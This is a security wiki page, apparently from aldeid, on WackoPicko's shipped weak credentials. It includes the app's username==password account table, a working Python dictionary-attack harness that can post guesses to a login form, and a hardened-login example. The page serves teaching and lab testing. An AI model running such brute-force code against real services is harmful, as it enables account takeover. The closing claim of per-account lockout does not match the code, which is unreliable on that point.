WackoPicko/Weak-Username-Password

From aldeid

Description

How many web applications (intranet, extranet, internet) suffer from weak authentication mechanisms, and how many of them suffer from weak passwords? I have worked for companies that develop web applications from a framework that contains the string:

<?php
// Hard-coded credentials: anyone who reads the source, or simply guesses, gets in
if ($username == "admin" && $password == "password") {
  /***
   * Grant access with full privs
   */
}

This example hard-codes admin/password as the login/password combination, and that single guessable pair gives full privileges on the backend of the application. WackoPicko is no better: every shipped account uses its username as its password.

Proof of Concept

No PoC is needed; here is the table of valid credentials shipped with WackoPicko:

  Priv      Username   Password
  Standard  scanner1   scanner1
  Standard  scanner2   scanner2
  Standard  bryce      bryce
  Admin     admin      admin
  Admin     adamd      adamd

How to detect?

  • A dictionary attack with Hydra (http-post-form module) against the login form is the typical approach: feed it a list of usernames and a list of passwords, and include each username as a candidate password, since accounts with password == username are common in test and default installs.
  • Refer to this article for more information: Bruteforce.
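The same attack written as a small Python harness, added here as an example (it is not code from the aldeid page or from WackoPicko). The ordering of guesses (username first, then username variants, then a common-password list) is the part worth copying; the HTTP path `/users/login.php`, the form field names `username`/`password` and the "failed login re-renders the form" heuristic in `http_login` are assumptions about the WackoPicko login form. The `mock_login` target and the account list are constructed from the table above so the harness runs offline.

```python
"""Dictionary attack harness against a login function.

Added example, not part of the aldeid page or WackoPicko. The URL path and
form field names used by http_login() are assumptions about the target.
"""
import urllib.parse
import urllib.request
from typing import Callable, Dict, Iterable, List

# Constructed sample data (the page's credential table), used only to build
# an offline mock target so the harness can be exercised without a live host.
MOCK_ACCOUNTS = {
    "scanner1": "scanner1",
    "scanner2": "scanner2",
    "bryce": "bryce",
    "admin": "admin",
    "adamd": "adamd",
}

# Constructed mini wordlist of the kind of guesses that catch weak accounts.
COMMON_PASSWORDS = ["password", "123456", "admin", "letmein", "welcome"]


def candidate_passwords(username: str, wordlist: Iterable[str]) -> List[str]:
    """Order guesses so the cheapest, most likely ones are sent first:
    the username itself, trivial variants of it, then the common list."""
    guesses = [username, username + "1", username + "123", username.capitalize()]
    guesses.extend(wordlist)
    ordered: List[str] = []
    seen = set()
    for g in guesses:  # deduplicate while preserving order; never waste a request
        if g not in seen:
            seen.add(g)
            ordered.append(g)
    return ordered


def brute_force(login: Callable[[str, str], bool], usernames: Iterable[str],
                wordlist: Iterable[str]) -> Dict[str, str]:
    """Try every (user, guess) pair and return the credentials that worked."""
    found: Dict[str, str] = {}
    wordlist = list(wordlist)
    for user in usernames:
        for guess in candidate_passwords(user, wordlist):
            if login(user, guess):
                found[user] = guess
                break  # account cracked, move on to the next one
    return found


def mock_login(username: str, password: str) -> bool:
    """Offline stand-in for the target: plaintext comparison, exactly the
    kind of check the hard-coded snippet above performs."""
    return MOCK_ACCOUNTS.get(username) == password


def http_login(base_url: str, username: str, password: str,
               failure_marker: bytes = b"<form") -> bool:
    """POST to the (assumed) WackoPicko login form.

    Assumption: a failed login re-renders the login form, so the absence of
    `failure_marker` in the response is treated as success. Verify this
    heuristic manually against the target before trusting the results.
    """
    data = urllib.parse.urlencode({"username": username, "password": password}).encode()
    req = urllib.request.Request(base_url.rstrip("/") + "/users/login.php", data=data)
    with urllib.request.urlopen(req, timeout=10) as resp:
        return failure_marker not in resp.read()


if __name__ == "__main__":
    users = ["scanner1", "scanner2", "bryce", "admin", "adamd", "nobody"]
    # Offline run against the mock target; swap in
    # lambda u, p: http_login("http://127.0.0.1/WackoPicko", u, p) for a live one.
    print(brute_force(mock_login, users, COMMON_PASSWORDS))
```

Against the mock target every account in the table falls on the very first guess, which is the point: with no lockout, the cost of the attack is one request per account.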

How to protect against it?

  • Enforce a strong password policy (minimum length, reject passwords equal to or containing the username, reject common passwords), and never ship or hard-code default credentials such as admin/admin.
  • Do not store passwords in clear text, and do not merely encrypt them (an attacker who gets the database often gets the key too): store a per-user salted hash computed with a slow password hashing function (bcrypt, scrypt, Argon2 or PBKDF2) and compare in constant time.
  • Protect the login against brute force attacks (e.g. lock out an IP address after 3 unsuccessful login attempts for a period of time). The attacker can still change IP address, so combine this with per-account throttling, but it makes the attack considerably more expensive.
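What the three protections above look like together in code, as an added example (not from the aldeid page or WackoPicko), using only the Python standard library: a password policy check, PBKDF2-HMAC-SHA256 with a random per-user salt and a constant-time comparison, and a per-source lockout after 3 failures. The iteration count, the 15-minute lockout window and the small common-password list are assumptions chosen for the example; `now` is passed in explicitly so the lockout expiry can be exercised without waiting.

```python
"""Hardened login: password policy, salted slow hash, per-source lockout.

Added example, not part of the aldeid page or WackoPicko. Standard library only.
"""
import hashlib
import hmac
import os
import time
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Tuple

PBKDF2_ITERATIONS = 600_000   # assumption: every guess costs the attacker this much work
MAX_FAILURES = 3              # the page's suggestion: deny after 3 failed attempts
LOCKOUT_SECONDS = 900         # assumption: 15-minute lockout window
COMMON_PASSWORDS = {"password", "admin", "123456", "letmein"}  # constructed mini list


def hash_password(password: str, salt: Optional[bytes] = None) -> Tuple[bytes, bytes]:
    """Return (salt, digest). A fresh random salt per user defeats precomputed
    tables; only the salt and digest are ever stored, never the password."""
    salt = os.urandom(16) if salt is None else salt
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ITERATIONS)
    return salt, digest


def check_policy(username: str, password: str) -> Optional[str]:
    """Return the reason a password is rejected, or None if it is acceptable."""
    if len(password) < 12:
        return "shorter than 12 characters"
    if username.lower() in password.lower():
        return "contains the username"
    if password.lower() in COMMON_PASSWORDS:
        return "common password"
    return None


@dataclass
class AuthStore:
    users: Dict[str, Tuple[bytes, bytes]] = field(default_factory=dict)
    failures: Dict[str, List[float]] = field(default_factory=dict)  # keyed by source IP

    def register(self, username: str, password: str) -> None:
        reason = check_policy(username, password)
        if reason:
            raise ValueError("weak password: " + reason)
        self.users[username] = hash_password(password)

    def is_locked(self, source_ip: str, now: float) -> bool:
        """Locked when MAX_FAILURES failures fall inside the lockout window."""
        recent = [t for t in self.failures.get(source_ip, []) if now - t < LOCKOUT_SECONDS]
        self.failures[source_ip] = recent
        return len(recent) >= MAX_FAILURES

    def login(self, username: str, password: str, source_ip: str,
              now: Optional[float] = None) -> bool:
        now = time.time() if now is None else now
        if self.is_locked(source_ip, now):
            return False  # locked out: the password is not even evaluated
        record = self.users.get(username)
        if record is None:
            # Hash anyway so unknown and known usernames take the same time
            # (prevents username enumeration through response timing).
            hash_password(password, b"\x00" * 16)
            ok = False
        else:
            salt, stored = record
            _, candidate = hash_password(password, salt)
            ok = hmac.compare_digest(candidate, stored)  # constant-time comparison
        if not ok:
            self.failures.setdefault(source_ip, []).append(now)
        return ok


if __name__ == "__main__":
    store = AuthStore()
    try:
        store.register("admin", "admin")  # the WackoPicko default: rejected
    except ValueError as exc:
        print(exc)
    store.register("admin", "correct-horse-battery-staple-2024")
    for guess in ("admin", "password", "admin123", "correct-horse-battery-staple-2024"):
        print(guess, store.login("admin", guess, "10.0.0.9"))
```

Run stand-alone, the last line shows the fourth attempt failing even though the password is correct: three failures from that source have already triggered the lockout. Per-IP lockout alone is still bypassable by an attacker rotating addresses, which is why the store also keys on the account when you extend it.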
